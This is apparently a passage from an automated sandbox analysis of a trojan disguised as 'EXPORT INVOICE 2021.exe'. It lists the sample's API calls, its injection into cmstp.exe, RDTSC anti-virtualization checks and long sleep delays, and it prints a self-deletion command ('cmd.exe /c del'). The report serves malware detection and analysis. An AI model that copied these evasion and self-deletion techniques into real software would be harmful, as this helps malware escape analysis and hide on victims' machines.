          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041C3832_2_0041C383
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00408C3A2_2_00408C3A
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00408C802_2_00408C80
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00402D892_2_00402D89
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041CFD22_2_0041CFD2
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488B0908_2_0488B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_049310028_2_04931002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488841F8_2_0488841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488D5E08_2_0488D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487F9008_2_0487F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04870D208_2_04870D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048941208_2_04894120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04941D558_2_04941D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04896E308_2_04896E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AEBB08_2_048AEBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4CBC58_2_02D4CBC5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4C3838_2_02D4C383
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B8C68_2_02D4B8C6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D32FB08_2_02D32FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D38C808_2_02D38C80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D38C3A8_2_02D38C3A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D32D908_2_02D32D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D32D898_2_02D32D89
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0487B150 appears 32 times
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004185E0 NtCreateFile,2_2_004185E0
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00418690 NtReadFile,2_2_00418690
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00418710 NtClose,2_2_00418710
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004187C0 NtAllocateVirtualMemory,2_2_004187C0
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041868A NtReadFile,2_2_0041868A
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041870A NtClose,2_2_0041870A
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004187BB NtAllocateVirtualMemory,2_2_004187BB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9840 NtDelayExecution,LdrInitializeThunk,8_2_048B9840
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9860 NtQuerySystemInformation,LdrInitializeThunk,8_2_048B9860
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B99A0 NtCreateSection,LdrInitializeThunk,8_2_048B99A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B95D0 NtClose,LdrInitializeThunk,8_2_048B95D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_048B9910
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9540 NtReadFile,LdrInitializeThunk,8_2_048B9540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B96D0 NtCreateKey,LdrInitializeThunk,8_2_048B96D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B96E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_048B96E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A50 NtCreateFile,LdrInitializeThunk,8_2_048B9A50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9650 NtQueryValueKey,LdrInitializeThunk,8_2_048B9650
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_048B9660
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9780 NtMapViewOfSection,LdrInitializeThunk,8_2_048B9780
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9FE0 NtCreateMutant,LdrInitializeThunk,8_2_048B9FE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9710 NtQueryInformationToken,LdrInitializeThunk,8_2_048B9710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B98A0 NtWriteVirtualMemory,8_2_048B98A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B98F0 NtReadVirtualMemory,8_2_048B98F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9820 NtEnumerateKey,8_2_048B9820
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BB040 NtSuspendThread,8_2_048BB040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B99D0 NtCreateProcessEx,8_2_048B99D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B95F0 NtQueryInformationFile,8_2_048B95F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9520 NtWaitForSingleObject,8_2_048B9520
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BAD30 NtSetContextThread,8_2_048BAD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9950 NtQueueApcThread,8_2_048B9950
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9560 NtWriteFile,8_2_048B9560
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A80 NtOpenDirectoryObject,8_2_048B9A80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A00 NtProtectVirtualMemory,8_2_048B9A00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A10 NtQuerySection,8_2_048B9A10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9610 NtEnumerateValueKey,8_2_048B9610
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9A20 NtResumeThread,8_2_048B9A20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9670 NtQueryInformationProcess,8_2_048B9670
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B97A0 NtUnmapViewOfSection,8_2_048B97A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BA3B0 NtGetContextThread,8_2_048BA3B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9B00 NtSetValueKey,8_2_048B9B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BA710 NtOpenProcessToken,8_2_048BA710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9730 NtQueryVirtualMemory,8_2_048B9730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9760 NtOpenProcess,8_2_048B9760
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B9770 NtSetInformationFile,8_2_048B9770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048BA770 NtOpenThread,8_2_048BA770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D48690 NtReadFile,8_2_02D48690
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D487C0 NtAllocateVirtualMemory,8_2_02D487C0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D48710 NtClose,8_2_02D48710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D485E0 NtCreateFile,8_2_02D485E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4868A NtReadFile,8_2_02D4868A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D487BB NtAllocateVirtualMemory,8_2_02D487BB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4870A NtClose,8_2_02D4870A
          Source: EXPORT INVOICE 2021.exe, 00000000.00000000.671752764.0000000000A00000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.797551448.0000000000B60000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exe, 00000002.00000002.799092420.00000000017DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exeBinary or memory string: OriginalFilenameCXGHo0w.exe> vs EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exeVirustotal: Detection: 32%
          Source: EXPORT INVOICE 2021.exeMetadefender: Detection: 17%
          Source: EXPORT INVOICE 2021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'Jump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EXPORT INVOICE 2021.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@10/2
          Source: EXPORT INVOICE 2021.exe, 00000000.00000000.671512016.0000000000932000.00000002.00020000.sdmp, EXPORT INVOICE 2021.exe, 00000002.00000002.797206646.0000000000A92000.00000002.00020000.sdmpBinary or memory string: INSERT INTO RolPermiso(RolPermiso_rol, RolPermiso_permiso) VALUES (;Error - Nuevo - RolPermisoDAL
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: EXPORT INVOICE 2021.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: EXPORT INVOICE 2021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe, 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B822 push eax; ret 2_2_0041B828
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B82B push eax; ret 2_2_0041B892
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B88C push eax; ret 2_2_0041B892
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00418AC1 push cs; retf 2_2_00418AC4
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00415AE6 push ecx; ret 2_2_00415B1F
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00415AF0 push ecx; ret 2_2_00415B1F
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004152B2 push eax; retf 2_2_004152B3
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0040861B push edi; iretd 2_2_0040861C
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041CE9A push FFFFFFE5h; retf 2_2_0041CE9F
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B7D5 push eax; ret 2_2_0041B828
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00A97A1F push esi; iretd 2_2_00A97A2E
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00A94459 push cs; retf 2_2_00A9445C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048CD0D1 push ecx; ret 8_2_048CD0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D48AC1 push cs; retf 8_2_02D48AC4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D45AF0 push ecx; ret 8_2_02D45B1F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D45AE6 push ecx; ret 8_2_02D45B1F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D452B2 push eax; retf 8_2_02D452B3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B88C push eax; ret 8_2_02D4B892
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B822 push eax; ret 8_2_02D4B828
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B82B push eax; ret 8_2_02D4B892
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4D1CA pushfd ; iretd 8_2_02D4D1CB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4CE9A push FFFFFFE5h; retf 8_2_02D4CE9F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4BE49 push edi; iretd 8_2_02D4BE4A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4BE75 push ebx; iretd 8_2_02D4BE76
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D3861B push edi; iretd 8_2_02D3861C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_02D4B7D5 push eax; ret 8_2_02D4B828
          Source: initial sampleStatic PE information: section name: .text entropy: 7.07298793214

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'Jump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002D38604 second address: 0000000002D3860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002D3899E second address: 0000000002D389A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe TID: 6708Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004088D0 rdtsc 2_2_004088D0
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000000.743466087.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.739552326.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.743466087.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.743692325.000000000A716000.00000004.00000001.sdmpBinary or memory string: 0d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000004.00000000.736762882.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@